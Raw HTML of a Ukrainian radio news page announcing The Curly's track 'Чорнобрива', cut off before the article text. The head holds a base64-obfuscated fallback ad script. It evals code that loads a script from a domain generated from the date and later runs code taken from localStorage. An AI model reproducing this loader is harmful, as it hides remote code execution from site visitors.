<!doctype html>
<html class="no-js" lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0' name='viewport' />

<link rel="shortcut icon" href="/assets/images/favicons/favicon.ico?v=57" />
<link rel="apple-touch-icon-precomposed" sizes="57x57" href="/assets/images/favicons/apple-icon-57x57.png?v=57" />
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="/assets/images/favicons/apple-icon-114x114.png?v=57" />
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="/assets/images/favicons/apple-icon-72x72.png?v=57" />
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="/assets/images/favicons/apple-icon-144x144.png?v=57" />
<link rel="apple-touch-icon-precomposed" sizes="60x60" href="/assets/images/favicons/apple-icon-60x60.png?v=57" />
<link rel="apple-touch-icon-precomposed" sizes="120x120" href="/assets/images/favicons/apple-icon-120x120.png?v=57" />
<link rel="apple-touch-icon-precomposed" sizes="76x76" href="/assets/images/favicons/apple-icon-76x76.png?v=57" />
<link rel="apple-touch-icon-precomposed" sizes="152x152" href="/assets/images/favicons/apple-icon-152x152.png?v=57" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-196x196.png?v=57" sizes="196x196" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-96x96.png?v=57" sizes="96x96" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-64x64.png?v=57" sizes="64x64" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-48x48.png?v=57" sizes="48x48" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-32x32.png?v=57" sizes="32x32" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-24x24.png?v=57" sizes="24x24" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-16x16.png?v=57" sizes="16x16" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-128x128.png?v=57" sizes="128x128" />
<meta name="msapplication-square70x70logo" content="/assets/images/favicons/mstile-70x70.png?v=57" />
<meta name="msapplication-square150x150logo" content="/assets/images/favicons/mstile-150x150.png?v=57" />
<meta name="msapplication-wide310x150logo" content="/assets/images/favicons/mstile-310x150.png?v=57" />
<meta name="msapplication-square310x310logo" content="/assets/images/favicons/mstile-310x310.png?v=57" />
<meta name="msapplication-TileColor" content="#ffffff" />

<link rel="stylesheet" href="/assets/css/app.min.css?v=57">
<link rel="stylesheet" href="/assets/css/fotorama.css?v=57">
<script></script>
<script>
        var isMobile = function () {
    return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
};

var lazyLoadScripts = function (func, time) {
    window.addEventListener('load', function () {
        setTimeout(func, time);
    });
}

if (isMobile()) {
                                            } else {
    var node6778 = document.getElementById("MIXADV_6778");
    if( node6778 )
    {
        var script = document.createElement("script");
        script.charset = "utf-8";
        script.src = "https://m.mixadvert.com/show/?id=6778&r="+Math.random();
        node6778.parentNode.appendChild(script);
        script.onerror = function(){
            window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY3NzggLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjc3OC5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTY3NzgucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY3NzguaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY3NzgiKSkgfSwgNTAwMCk7ICA7fTsg") );
        }
    }
}    </script>
<![if !IE]>
<script src="/assets/js/jquery-3.6.0.min.js?v=57"></script>
<![endif]>
<script src="/assets/js/lib.top.min.js?v=57"></script>
<![if IE]>
<script src="/assets/js/html5shiv.min.js?v=57"></script>
<script src="/assets/js/jquery-1.12.0.min.js?v=57"></script>
<script src="/assets/js/respond.min.js?v=57"></script>
<script src="/assets/js/rem.min.js?v=57"></script>
<![endif]>
<title data-ajax-replace="true">"Чорнобрива": слухайте крутий трек від юного виконавця The Curly - Радіо Максимум</title>
<meta data-ajax-replace="true" name="title" content="'Чорнобрива': слухайте крутий трек від юного виконавця The Curly - Радіо Максимум" />
<meta data-ajax-replace="true" name="description" content="Трек 'Чорнобрива' – це другий сингл в кар'єрі молодого виконавця The Curly, нового підписанта лейбу Black Beats. Слухайте і ви нову цікаву музичну роботу!" />
<link data-ajax-replace="true" rel="canonical" href="https://maximum.fm/chornobriva-sluhajte-krutij-trek-vid-yunogo-vikonavcya-the-curly_n206316" />
<link data-ajax-replace="true" rel="amphtml" href="https://maximum.fm/chornobriva-sluhajte-krutij-trek-vid-yunogo-vikonavcya-the-curly_n206316/amp">
<meta data-ajax-replace="true" name="author" content='maximum.fm'>
<meta data-ajax-replace="true" name="apple-itunes-app" content="app-id=797596046">
<meta data-ajax-replace="true" name="google-play-app" content="app-id=com.radio24.ua">
<meta data-ajax-replace="true" property="og:type" content="website" />
<meta data-ajax-replace="true" property="og:title" content="'Чорнобрива': слухайте крутий трек від юного виконавця The Curly - Радіо Максимум" />
<meta data-ajax-replace="true" property="og:description" content="Трек 'Чорнобрива' – це другий сингл в кар'єрі молодого виконавця The Curly, нового підписанта лейбу Black Beats. Слухайте і ви нову цікаву музичну роботу!" />
<meta data-ajax-replace="true" property="og:site_name" content="Радіо Максимум" />
<meta property="og:image" content="https://maximum.fm/uploads/media_news/2022/10/633d59e407cfd038061391.jpg?w=1200&amp;h=675&amp;il&amp;q=60&amp;output=jpg" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:site" content="@MAXIMUMFM_ua" />
<meta name="twitter:creator" content="@MAXIMUMFM_ua" />
<meta data-ajax-replace="true" property="og:url" content="https://maximum.fm/chornobriva-sluhajte-krutij-trek-vid-yunogo-vikonavcya-the-curly_n206316" />
<meta data-ajax-replace="true" property="fb:admins" content="100002197865474" />
<meta data-ajax-replace="true" property="fb:app_id" content="899863283383667" />
<meta data-ajax-replace="true" property="fb:pages" content="100876706667611" />
<script type="application/ld+json">
            {
              "@context": "http://schema.org",
              "@type": "NewsArticle",
              "mainEntityOfPage":{
                "@type": "WebPage",
                "@id": "https://maximum.fm/chornobriva-sluhajte-krutij-trek-vid-yunogo-vikonavcya-the-curly_n206316"
              },
              "headline": "'Чорнобрива': слухайте крутий трек від юного виконавця The Curly",
              "image": {
                "@type": "ImageObject",
                "url": "https://maximum.fm/uploads/media_news/2022/10/633d59e407cfd038061391.jpg?w=1200&amp;h=675&amp;il&amp;q=60&amp;output=jpg",
                "width": 1200,
                "height": 675
              },
              "datePublished": "2022-10-05 18:21:00",
              "dateModified": "2022-10-06 01:05:22",
                "author": {
                    "@type": "Organization",
                    "name": "maximum.fm"
                },

                "publisher": {
                    "@type": "Organization",
                    "name": "maximum.fm",
                    "email": "music@maximum.fm",
                    "url": "https://maximum.fm/",
                    "logo": {
                        "@type": "ImageObject",
                        "url": "https://maximum.fm/assets/images/favicons/favicon-64x64.png?v=57",
                        "width": 60,
                        "height": 60
                    }
                }
            }

    </script>
<script type="application/ld+json">
        {
         "@context": "http://schema.org",
         "@type": "BreadcrumbList",
         "itemListElement": [{
                    "@type": "ListItem",
                    "position": 1,
                    "name": "Радіо Максимум",
                    "item": "https://maximum.fm/"
                },{
                    "@type": "ListItem",
                    "position": 2,
                    "name": "Шоу-біз",
                    "item": "https://maximum.fm/shou-biz_t22786"
                }

                            ,{
                    "@type": "ListItem",
                    "position": 3,
                    "name": "Музика",
                    "item": "https://maximum.fm/muzika_t22828"
                }
                        ]
        }
    </script>

<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-W8D5HV"
                  height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
            new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
            j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
            '//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer','GTM-W8D5HV');</script>

<link rel="manifest" href="/manifest.json">
<link rel="preconnect" href="https://membrana-cdn.media/" crossorigin>
<link rel="dns-prefetch" href="https://membrana-cdn.media/">
<script async="async" src="https://www.googletagservices.com/tag/js/gpt.js"></script>
<script async="async" src="https://cdn.membrana.media/mfm/ym.js"></script>
<style>
        .nts-video {height: calc((100vw - 30) / 16 * 9); max-height: 360px}
        @media (max-width: 480px) {.nts-video {height: calc(100vw / 16 * 9)}  }
        .nts-video-wrapper {padding-top: 10px; padding-bottom: 20px}
        .nts-video-label {font-size: 12px; font-family: "Helvetica Neue", Arial, sans-serif; line-height: 12px; text-transform: uppercase; color: #999; text-align: center}
        .nts-float-container {z-index: 2!important;}
    </style>
<script>
        lazyLoadScripts( function () {
            var parentEl = document.getElementsByTagName('head');
            var gravitecScript = document.createElement('script');
            gravitecScript.src = "https://cdn.gravitec.net/storage/7e008d1c9fd1a6f52c684c44732eb9f0/client.js"
            gravitecScript.async
            parentEl[0].appendChild(gravitecScript);
        }, 2500);
    </script>
</head>
<body>
<script>
    var dfpAdSlots = [];
</script>
<header class="radio">
<div class="top-section">
<div class="row  red-pla">
<div class="logo-wrapper">
<a href="/" class="header-logo ajaxLink" data-url="/">
</a>
</div>
<div class="all-stations-wrapper stations-wrapper">
<div class="all-stations">
<a id="otherStationsButton" class="open-next-station" aria-expanded="true" style="display: none;">
</a>
<div class="other-stations station-list" id="otherStations" aria-expanded="true">
<div class="next-station-text">Радіостанції</div>
<div class="station-wrapper station-item">
<button class="play-btn play" data-station-name="onair" data-station-id="4" data-station-display-name="ONAIR" data-toggle="otherStations otherStationsButton" data-toggler=".active">
</button>
<a href="/archive" class="ajaxLink" data-url="/archive" title="ONAIR" data-toggle="otherStations otherStationsButton" data-toggler=".active">
<div class="station-name">ONAIR</div>
</a>
</div>
</div>
<div class="station-wrapper station-wrapper-top">
<button class="play-btn play" data-station-name="onair" data-station-id="4" data-station-display-name="ONAIR"></button>
<div class="station-name">
<div>
слухати
<span> ONAIR</span>
</div>
<a href="" id="audio-adv" class="link-to-adv hidden" target="_blank">Перейти на сайт рекламодавця</a>
</div>
</div>
</div>
</div>
<div class="column on-air-wrapper">
<div class="playing-songs-wrapper">
<a data-toggle="openNextSongs openNextSongsButton" data-toggler=".active" id="openNextSongsButton" class="open-next-songs" aria-expanded="true" data-b="efqd6m-b" style="">
</a>
<div class="next-songs-wrapper" id="openNextSongs" data-toggler=".active" aria-expanded="true" data-b="iteq36-b">
<div class="next-songs-text">Далі в ефірі:</div>
<div class="next-songs-list"></div>
</div>
<div class="song-wrapper now-playing-song"></div>
</div>
</div>
<div class="options-wrapper column medium-4 large-4 small-5 " id="profile-wrapper">
<div class="volume show-for-large">
<div class="volume-sign up"></div>
<div class="volume-slider-wrapper ">
<div class="slider volume-progress" data-slider data-initial-start="100" data-start="0">
<span class="volume-progress-handle" data-slider-handle role="slider" tabindex="1" style="left: 100%;"></span>
<span class="volume-progress-fill" data-slider-fill></span>
<input type="hidden">
</div>
</div>
</div>
<div id="popup" data-user="-1">
 <button class="lock flat-button" data-toggle="login-popup" aria-controls="login-popup" id="login-form-show"></button>
<div class="login-popup bounce-in fast" data-submenu id="login-popup" data-toggler data-animate="scale-in-up scale-out-down">
<button class="icon-button close" data-toggle="login-popup" aria-controls="login-popup"></button>
<div class="title">Вхід через соцмережі</div>
<ul class="social-login-buttons">
<a href="/login/facebook" alt="Sign in with Facebook">
<li class="facebook"></li>
</a>
<a href="/login/twitter" alt="Sign in with twitter">
<li class="twitter"></li>
</a>
<a href="/login/google" alt="Sign in with Google">
<li class="google"></li>
</a>
</ul>
<div class="title">Вхід</div>
<form class="login-popup-form" role="form" action="/login_check" method="post">
<label style="display: none" id="form-error-label"></label>
<input class="log-input" type="text" placeholder="Логін" id="username" name="_username" value="" required="required">
<input class="log-input" type="password" placeholder="Пароль" id="password" name="_password">
<div class="other-login-options">
<input type="checkbox" id="remember_me" name="_remember_me" />
<label for="remember_me">
Запам'ятати мене
</label>
<a id="forgot-password">Забули пароль?</a>
</div>
<div class="enter-login-options">
<a data-url="/register" title="Зареєструватись" href="/register" class="icon-button ajaxLink closeBtn">Зареєструватись</a>
<button class="border-button submit-login" id="login-btn-submit" data-toggle="login-popup" aria-controls="login-popup">увійти
</button>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
<div class="webcamera-wrapper">
<div class="row">
<div class="small-12 columns">
<h2>
ВЕБ-КАМЕРА
</h2>
</div>
<div class="medium-8 small-12 columns">
<div class="iframe-wrapper">
<video id="webcamera-player" class="video-js vjs-default-skin tube-css vjs-16-9" preload="auto" poster="https://maximum.fm/assets/images/maximum-new-red-2020-10.svg?v=57" controls playsinline>
</video>
</div>
</div>
<div class="medium-4 small-12 columns other-video-wrapper">
<div class="other-video">
<div class="video-item">
<div class="img-wrap">
<img src="/uploads/media_news/2022/10/633d5fc075b78003429594.png?w=110&amp;h=77&amp;il&amp;q=60&amp;output=jpg" alt="">
</div>
<div class="text">
<h3 class="title">
<a data-url="/fiinka-bij-sluhajte-pisnyu-pro-te-shcho-treba-robiti-z-vorogom_n206315" target="_self" title="" class=" ajaxLink" href="/fiinka-bij-sluhajte-pisnyu-pro-te-shcho-treba-robiti-z-vorogom_n206315">
FIINKA – "Бий!": слухайте пісню про те, що треба робити з ворогом
<i class="video-icon">відео</i>
</a>
</h3>
<footer>
сьогодні, 20:25
</footer>
</div>
</div>
<div class="video-item">
<div class="img-wrap">
<img src="/uploads/media_news/2022/10/633d50f4c03d9534304049.png?w=110&amp;h=77&amp;il&amp;q=60&amp;output=jpg" alt="">
</div>
<div class="text">
<h3 class="title">
<a data-url="/cheev-mriyeshsya-merezhu-pidkoryuye-nova-pisnya-vid-avtora-hita-garno-tak_n206313" target="_self" title="" class=" ajaxLink" href="/cheev-mriyeshsya-merezhu-pidkoryuye-nova-pisnya-vid-avtora-hita-garno-tak_n206313">
CHEEV – "Мрієшся": мережу підкорює нова пісня від автора хіта "Гарно так"
<i class="video-icon">відео</i>
</a>
</h3>
<footer>
сьогодні, 19:23
</footer>
</div>
</div>
<div class="video-item">
<div class="img-wrap">
<img src="/uploads/media_news/2022/10/633d59e407cfd038061391.jpg?w=110&amp;h=77&amp;il&amp;q=60&amp;output=jpg" alt="">
</div>
<div class="text">
<h3 class="title">
<a data-url="/chornobriva-sluhajte-krutij-trek-vid-yunogo-vikonavcya-the-curly_n206316" target="_self" title="" class=" ajaxLink" href="/chornobriva-sluhajte-krutij-trek-vid-yunogo-vikonavcya-the-curly_n206316">
"Чорнобрива": слухайте крутий трек від юного виконавця The Curly
<i class="video-icon">відео</i>
</a>
</h3>
<footer>
сьогодні, 18:21
</footer>
</div>
</div>
<div class="video-item">
<div class="img-wrap">
<img src="/uploads/media_news/2022/10/633d569b48da1345349930.png?w=110&amp;h=77&amp;il&amp;q=60&amp;output=jpg" alt="">
</div>
<div class="text">
<h3 class="title">
<a data-url="/roxolana-prezentuvala-pisnyu-im-gone-vid-imeni-ditej-yakih-vbili-rosijski-okupanti_n206318" target="_self" title="" class=" ajaxLink" href="/roxolana-prezentuvala-pisnyu-im-gone-vid-imeni-ditej-yakih-vbili-rosijski-okupanti_n206318">
ROXOLANA презентувала пісню "I'm Gone" від імені дітей, яких вбили російські окупанти
<i class="video-icon">відео</i>
</a>
</h3>
<footer>
сьогодні, 17:22
</footer>
</div>
</div>
</div>
<button class="load-more load-more-news">
arrow
</button>
</div>
</div>
</div>
<div class="bottom-section">
<div class="row  menu-wrapper">
<div class="small-12 columns">
<div class="row">
<div class="small-12 columns">
<div class="mobile-header" style="">
<div class="hamburger hamburger--collapse">
<span class="hamburger-box">
<span class="hamburger-inner"></span>
</span>
</div>
<a href="/" class="logo ajaxLink" data-url="/">
<img src="/assets/images/logo-maximum-2020-10.svg?v=57" style="width: 100px; height: 54px" alt="Mobile logo">
</a>
<div id="popup" data-user="-1">
<button class="lock flat-button" data-toggle="login-popup" aria-controls="login-popup" id="login-form-show"></button>
<div class="login-popup bounce-in fast" data-submenu id="login-popup" data-toggler data-animate="scale-in-up scale-out-down">
<button class="icon-button close" data-toggle="login-popup" aria-controls="login-popup"></button>
<div class="title">Вхід через соцмережі</div>
<ul class="social-login-buttons">
<a href="/login/facebook" alt="Sign in with Facebook">
<li class="facebook"></li>
</a>
<a href="/login/twitter" alt="Sign in with twitter">
<li class="twitter"></li>
</a>
<a href="/login/google" alt="Sign in with Google">
<li class="google"></li>
</a>
</ul>
<div class="title">Вхід</div>
<form class="login-popup-form" role="form" action="/login_check" method="post">
<label style="display: none" id="form-error-label"></label>
<input class="log-input" type="text" placeholder="Логін" id="username" name="_username" value="" required="required">
<input class="log-input" type="password" placeholder="Пароль" id="password" name="_password">
<div class="other-login-options">
<input type="checkbox" id="remember_me" name="_remember_me" />
<label for="remember_me">
Запам'ятати мене
</label>
<a id="forgot-password">Забули пароль?</a>
</div>
<div class="enter-login-options">
<a data-url="/register" title="Зареєструватись" href="/register" class="icon-button ajaxLink closeBtn">Зареєструватись</a>
<button class="border-button submit-login" id="login-btn-submit" data-toggle="login-popup" aria-controls="login-popup">увійти
</button>
</div>
</form>
</div>
</div>
</div>
<div class="menu">
<div class="tagName-novini menu-item ">
<a href="/novini_t2" class="menu-link ajaxLink" data-url="/novini_t2">
Новини
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/ukrayina_t22822" class="tagName-ukrayina sub-menu-item ajaxLink" data-url="/ukrayina_t22822">
Україна
</a>

<a href="/svit_t15" class="tagName-svit sub-menu-item ajaxLink" data-url="/svit_t15">
Світ
</a>
<a href="/sport_t22784" class="tagName-sport sub-menu-item ajaxLink" data-url="/sport_t22784">
Спорт
</a>
<a href="/kultura_t10" class="tagName-kultura sub-menu-item ajaxLink" data-url="/kultura_t10">
Культура
</a>
<a href="/foto_t6" class="tagName-foto sub-menu-item ajaxLink" data-url="/foto_t6">
Фото
</a>
<a href="/video_t7" class="tagName-video sub-menu-item ajaxLink" data-url="/video_t7">
Відео
</a>
</div>
</div>
</div>
<div class="tagName-shou-biz menu-item ">
<a href="/shou-biz_t22786" class="menu-link ajaxLink" data-url="/shou-biz_t22786">
Шоу-біз
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
 <a href="/zirki_t23798" class="tagName-zirki sub-menu-item ajaxLink" data-url="/zirki_t23798">
Зірки
</a>
<a href="/moda_t22837" class="tagName-moda sub-menu-item ajaxLink" data-url="/moda_t22837">
Мода
</a>
<a href="/kino_t22736" class="tagName-kino sub-menu-item ajaxLink" data-url="/kino_t22736">
Кіно
</a>
<a href="/seriali_t23561" class="tagName-seriali sub-menu-item ajaxLink" data-url="/seriali_t23561">
Серіали
</a>
<a href="/televizijni-shou_t23799" class="tagName-televizijni-shou sub-menu-item ajaxLink" data-url="/televizijni-shou_t23799">
ТБ-шоу
</a>
<a href="/muzichni-novinki_t23831" class="tagName-muzichni-novinki sub-menu-item ajaxLink" data-url="/muzichni-novinki_t23831">
Музичні новинки
</a>
</div>
</div>
</div>
 <div class="tagName-lajfstajl menu-item ">
<a href="/lajfstajl_t23832" class="menu-link ajaxLink" data-url="/lajfstajl_t23832">
Лайфстайл
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/zdorovya_t22746" class="tagName-zdorovya sub-menu-item ajaxLink" data-url="/zdorovya_t22746">
Здоров&#039;я
</a>
<a href="/yizha_t23025" class="tagName-yizha sub-menu-item ajaxLink" data-url="/yizha_t23025">
Їжа
</a>
<a href="/kurjozi_t22751" class="tagName-kurjozi sub-menu-item ajaxLink" data-url="/kurjozi_t22751">
Курйози
</a>
<a href="/podorozhi_t22743" class="tagName-podorozhi sub-menu-item ajaxLink" data-url="/podorozhi_t22743">
Подорожі
</a>
<a href="/goroskop_t23796" class="tagName-goroskop sub-menu-item ajaxLink" data-url="/goroskop_t23796">
Гороскоп
</a>
<a href="/testi_t22841" class="tagName-testi sub-menu-item ajaxLink" data-url="/testi_t22841">
Тести
</a>
</div>
</div>
</div>
<div class="tagName-tehnologiyi menu-item ">
<a href="/tehnologiyi_t18" class="menu-link ajaxLink" data-url="/tehnologiyi_t18">
Техно
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/gadzheti_t22745" class="tagName-gadzheti sub-menu-item ajaxLink" data-url="/gadzheti_t22745">
Гаджети
</a>
<a href="/avto_t22770" class="tagName-avto sub-menu-item ajaxLink" data-url="/avto_t22770">
Авто
</a>
<a href="/pobutova-tehnika_t23833" class="tagName-pobutova-tehnika sub-menu-item ajaxLink" data-url="/pobutova-tehnika_t23833">
Побутова техніка
</a>
<a href="/internet_t22835" class="tagName-internet sub-menu-item ajaxLink" data-url="/internet_t22835">
Інтернет
</a>
<a href="/igri_t23443" class="tagName-igri sub-menu-item ajaxLink" data-url="/igri_t23443">
Ігри
</a>
<a href="/kosmos_t22839" class="tagName-kosmos sub-menu-item ajaxLink" data-url="/kosmos_t22839">
Космос
</a>
</div>
</div>
</div>
<div class="tagName-populyarne menu-item ">
<a href="/populyarne_t23834" class="menu-link ajaxLink" data-url="/populyarne_t23834">
Популярне
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/nostalgiya_t23821" class="tagName-nostalgiya sub-menu-item ajaxLink" data-url="/nostalgiya_t23821">
Ностальгія
</a>
<a href="/cikavinki_t23802" class="tagName-cikavinki sub-menu-item ajaxLink" data-url="/cikavinki_t23802">
Цікаві новини
</a>
<a href="/ukrayinska-muzika_t23685" class="tagName-ukrayinska-muzika sub-menu-item ajaxLink" data-url="/ukrayinska-muzika_t23685">
Українська музика
</a>
 <a href="/privitannya_t23757" class="tagName-privitannya sub-menu-item ajaxLink" data-url="/privitannya_t23757">
Привітання
</a>
<a href="/recepti_t23098" class="tagName-recepti sub-menu-item ajaxLink" data-url="/recepti_t23098">
Рецепти
</a>
<a href="https://maximum.fm/privitannya-z-dnem-narodzhennya-najkrashchi-vitannya-ukrayinskoyu-movoyu_n140167" class="tagName- sub-menu-item ajaxLink" data-url="https://maximum.fm/privitannya-z-dnem-narodzhennya-najkrashchi-vitannya-ukrayinskoyu-movoyu_n140167">
З днем народження
</a>
</div>
</div>
</div>
<div class="tagName-pro-radio menu-item ">
<a href="/pro-radio_t23861" class="menu-link ajaxLink" data-url="/pro-radio_t23861">
Про радіо
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/staff" class="tagName- sub-menu-item ajaxLink" data-url="/staff">
Ведучі
</a>
<a href="/radiocovermap" class="tagName- sub-menu-item ajaxLink" data-url="/radiocovermap">
Карта покриття
</a>

<a href="/contacts" class="tagName- sub-menu-item ajaxLink" data-url="/contacts">
Контакти
</a>
<a href="/archive" class="tagName- sub-menu-item ajaxLink" data-url="/archive">
Що звучало в ефірі
</a>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</header>
<div class="main-content">
<div class="reveal" style="position: relative;" id="register-start" data-reveal>
<span class="replace-h3">Вітаємо на сайті Радіо Максимум!</span>
<p class='lead'>На вказану електронну адресу було надіслано повідомлення для підтвердження реєстрації</p>
<button class="close-button" data-close aria-label="Close reveal" type="button" onClick="window.location.reload()">
<span aria-hidden="true">&times;</span>
</button>
</div>
<div class="reveal" style="position: relative;" id="resetting-start" data-reveal>
<form action="/resetting/send-email" method="POST" class="fos_user_resetting_request" id="fos_user_resetting_request" novalidate>
<span class="replace-h4">Форма для відновлення паролю</span>
<div>
<input type="text" class="base-input" id="username_email" name="username" required="required" placeholder="Введіть логін або електронну пошту!" autofocus />
<p id="error-message" style="display: none; color: red;">Такий логін або адреса електронної пошти не зареєстровані в системі!</p>
</div>
<div class="large-4 float-right ">
<button type="submit" class="border-button " value="Надіслати">Надіслати</button>
</div>
</form>
<span class="replace-h5" id="show-message-from-resetting"></span>
<button class="close-button" data-close aria-label="Close reveal" type="button">
<span aria-hidden="true">&times;</span>
</button>
</div>
<div class="reveal" style="position: relative;" id="user-update" data-reveal>
<span class="replace-h4" style="text-align: center">Вітаємо, Ваші дані успішно оновлено!</span>
<button class="close-button" data-close aria-label="Close reveal" type="button" onClick="window.location.reload()">
<span aria-hidden="true">&times;</span>
</button>
</div>
<script>
        if (typeof window.widget !== 'undefined') {
            window.widget.changeParam('newsId', '206316');
        }
    </script>
<div class="white">
<div id="loadNewsContainerData" data-news-id="206316" data-limit="1" data-offset="0" data-url="/get-scroll-news">
</div>
<div class="content-wrapper  row" data-title="" Чорнобрива": слухайте крутий трек від юного виконавця The Curly" data-image="https://maximum.fm/uploads/media_news/2022/10/633d59e407cfd038061391.jpg?w=424&amp;h=239&amp;il&amp;q=60&amp;output=jpg" data-author="Валентина Рущак" data-path="/chornobriva-sluhajte-krutij-trek-vid-yunogo-vikonavcya-the-curly_n206316" data-tags="Шоу-біз, Музика, Українська музика, Музичні новинки">
<div class="columns small-12 medium-12 large-8">
<div>
<div id="ontheioViewTacking" data-tags="Шоу-біз,Музика,Українська музика,Відео,Музичні новинки,Новини" class="news-content-wrapper" data-title="" Чорнобрива": слухайте крутий трек від юного виконавця The Curly - Радіо Максимум" data-path="/chornobriva-sluhajte-krutij-trek-vid-yunogo-vikonavcya-the-curly_n206316" data-id="206316">
<div class="top-tags-wrapper">
<a href="/vijna_t22973" class="top-tag">
<i class="flash"></i>Війна</a>
<a href="/ukrayinska-muzika_t23685" class="top-tag">
<i class="flash"></i>Українська музика</a>
</div>
<div class="news-title"><h1>"Чорнобрива": слухайте крутий трек від юного виконавця The Curly</h1>
</div>
<ul class="statistic">
<li class="date">
<time datetime="2022-10-05 18:21">
Вчора, 18:21
</time>
</li>
<li class="watchers">9</li>
</ul>
<div class="news-photo-container">
<div class="news-photo">
<img src="/uploads/media_news/2022/10/633d59e407cfd038061391.jpg?w=1200&amp;h=675&amp;il&amp;q=80&amp;output=jpg" title="&quot;Чорнобрива&quot;: слухайте крутий трек від юного виконавця The Curly - 1" alt="&quot;Чорнобрива&quot;: слухайте крутий трек від юного виконавця The Curly - фото 1">
<ul class="news-sharing ">
<li class="facebook-count counter">
<a id="facebook" data-news-url="https://maximum.fm/chornobriva-sluhajte-krutij-trek-vid-yunogo-vikonavcya-the-curly_n206316" href="javascript: void(0);" class="facebook inPage soc_counter_fb_206316">
</a>
</li>
<li class="twitter-count counter">
<a id="twitter" data-news-url="https://maximum.fm/chornobriva-sluhajte-krutij-trek-vid-yunogo-vikonavcya-the-curly_n206316" data-news-name="&quot;Чорнобрива&quot;: слухайте крутий трек від юного виконавця The Curly" href="javascript: void(0);" class="twitter inPage soc_counter_tw_206316">
</a>
</li>
</ul>
</div>
<div class="news-photo-sideblock show-for-medium">
<ul class="popular-news">
<li class="title">Популярне</li>
<li><a class="ajaxLink" data-url="/osinnya-pogoda-yak-odyagatisya-pri-temperaturi-15-gradusiv-shchob-bulo-komfortno_n184203" title="" href="/osinnya-pogoda-yak-odyagatisya-pri-temperaturi-15-gradusiv-shchob-bulo-komfortno_n184203">Осіння погода: як одягатися при температурі +15 градусів, щоб було комфортно</a></li>
<li><a class="ajaxLink" data-url="/chi-mozhna-zapivati-yizhu-vodoyu-eksperti-dali-vidpovid_n205833" title="" href="/chi-mozhna-zapivati-yizhu-vodoyu-eksperti-dali-vidpovid_n205833">Чи можна запивати їжу водою: експерти дали відповідь</a></li>
</ul>
</div>
</div>
<div class="news-content news-content-block">
